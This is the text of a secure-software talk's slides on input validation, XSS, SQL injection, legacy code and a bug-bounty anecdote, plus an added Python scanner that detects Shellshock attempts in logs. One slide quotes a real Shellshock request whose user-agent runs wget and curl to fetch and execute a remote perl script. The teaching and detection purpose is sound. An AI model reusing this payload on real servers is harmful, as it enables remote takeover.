Date posted: 22-Jan-2018
Category: Engineering
Upload: solita-oy
AGENDA
› How to make secure software?
› … But, everything is broken!
› … Because ...
  • Same mistakes are repeated.
  • Unthinkable, Unpossible, Impossiblator happens
› Practical web application security testing.
› Bonus: 10. fail 20. goto 10
“If you know the enemy and know yourself, you need not fear the result of a hundred battles.”
Sun Tzu, Art of War
Source: Hackerman, Kung Fury movie
Source: NSA recruitment video.
Source: securityintelligence.com
Source: Lizard Squad hacking group logo
RECIPE FOR SECURE SOFTWARE
1. Design it properly. Do the right thing.
2. Do it right
  1. Mistake in implementation = bug = security issue
3. Prepare for the unthinkable
(Bug bounties etc. are useful too, but out of scope here.)
DO THE RIGHT THING
1. Don’t roll your own.
  1. Especially, don’t invent hash algorithms, RND or crypto!
  2. Seriously. Failure imminent and certain.
2. Follow best practices.
3. Understand what you are doing.
  1. Read the RFC. Understand your tools and libs.
THE SAME STORY ALL OVER!
› XSS, CSRF, SQL injection, XXE..
  • Are all about input validation.
› Solution: whitelist what is allowed, deny everything else.
› There’s still 20% left
  • You can certainly fail session management, but..
  • Follow the advice: Don’t invent your own and you’ll be pretty safe.
“The most satisfying feeling you can get in the job is... The Pwn. Let's say you find SQL injection. Blood is rushing into your brain and that's what we call The Pwn. Your brain gets a really tight feeling, like your head is going to explode any minute.”
Arnold “Iceman” Schwarzenegger, movie Pwning Iron.
LET’S XSS !
› Reflected vs. Stored
› <script> doesn’t work?
  • No problem, JS is everywhere..
› Can’t XMLHttpRequest?
  • No prob, counter and fake
SQL INJECTION
› GRUYERE does not contain SQL injection..
› But .. It’s a good example of an injection
› SQL = Structured Query Language
  • However, “query” is a bit of a misnomer..
What is this???
FROM A REAL ACCESS LOG (CUSTOMER IP REDACTED)
› 2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print-wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid:
Google tip: Shellshock
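As an added illustration (not from the slides), here is a small Python scanner that parses request lines in the print-wrapper layout above and flags any header-derived field that starts with the `() {` bash function definition Shellshock payloads open with; the sample lines, the 192.0.2.x documentation IPs and the harmless `/bin/true` command are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Shellshock (CVE-2014-6271) payloads open with a bash function definition,
# "() {", smuggled in an HTTP header that a CGI handler exports as an env var.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
# Fields in the print-wrapper layout are "key: value" pairs joined by " ,".
# Split only where " ," is followed by another key, so commas inside values survive.
FIELD_SPLIT_RE = re.compile(r" ,(?=[\w-]+:)")

def parse_request_line(line: str) -> Optional[Dict[str, str]]:
    """Parse a 'Request N start. ...' log line into its header-like fields."""
    marker = " start. "
    idx = line.find(marker)
    if idx < 0:
        return None  # not a request-start line (e.g. 'Request N end.')
    fields: Dict[str, str] = {}
    for token in FIELD_SPLIT_RE.split(line[idx + len(marker):]):
        key, sep, value = token.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def detect_shellshock(fields: Dict[str, str]) -> List[str]:
    """Return the names of fields whose value looks like a Shellshock payload."""
    return [k for k, v in fields.items() if SHELLSHOCK_RE.search(v)]

def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan log lines and report each request carrying a suspicious field."""
    hits = []
    for line in lines:
        fields = parse_request_line(line)
        if fields is None:
            continue
        flagged = detect_shellshock(fields)
        if flagged:
            hits.append({"remote-addr": fields.get("remote-addr"),
                         "uri": fields.get("uri"), "fields": flagged})
    return hits

# Constructed sample lines in the same layout as the slide's log (documentation
# IPs from 192.0.2.0/24, a harmless command in place of the real downloader).
SAMPLE_LOG = [
    "2018-01-22 09:17:01,420 INFO xxxx.infra.print-wrapper: Request 1 start. host: 192.0.2.10 ,remote-addr: 192.0.2.20 ,method: GET "
    ",uri: /index.html ,query-string: ,user-agent: Mozilla/5.0 (X11; Linux) ,referer: ,oid:",
    "2018-01-22 09:17:02,001 INFO xxxx.infra.print-wrapper: Request 2 start. host: 192.0.2.10 ,remote-addr: 192.0.2.30 ,method: GET "
    ",uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/true ,referer: ,oid:",
    "2018-01-22 09:17:02,002 INFO xxxx.infra.print-wrapper: Request 2 end.",
]
print(scan_log(SAMPLE_LOG))  # one hit: request 2, flagged field 'user-agent'
```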
DEV OR OPS? OR #DEVSEC ?
› Who is responsible for that server?
› Do you need to care as a developer?
› Ultimately: What is the developer’s responsibility?
FAIL 1: THE BURDEN OF LEGACY
MD5 & C++ - “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE”
› Native code is dangerous..
  • ASLR & DEP make buffer overflows more difficult to exploit, but it still happens.
› The lifespan of software can be surprisingly long..
  • How to update and re-evaluate working software if nothing happens?
  • Home exercise: Sell this to team & customer. Involves risk and cost.
› New threats have emerged.
  • What parts are affected?
Screenshot removed..
FAIL 2: SHORTCUTS AND ANARCHY
› Root cause: Heavy process, not understood / accepted by devs
  • making developers miserable..
› The devs are innovative people..
http//unauthorized..V 1.3 coolserver
AwesomeSoftware_Upgrade.exe
STORY 4: THE WEBHACK EVENT
› http://webhack.fi was a light-weight fun bug bounty hunt..
  • The targets are not publicly accessible, but were production systems we created for our customers.
› Hackers hacked..
› .. SQL injection -> dumped the whole database
› .. But our code was fine! WAT?
ONE DOES NOT SIMPLY INJECT INTO..
› One issue turned out to be a 0-day in Spring libraries..
› Hnggh..
› The moral of the story is two-fold:
  1. even if you do everything right, you can still fail
  2. it’s not always so easy in real life..
› The gory details: https://github.com/solita/sqli-poc
FURTHER MATERIAL
• From the internet:
  • OWASP Top 10: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
  • OWASP ZAP proxy: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
  • Kali Linux: https://www.kali.org/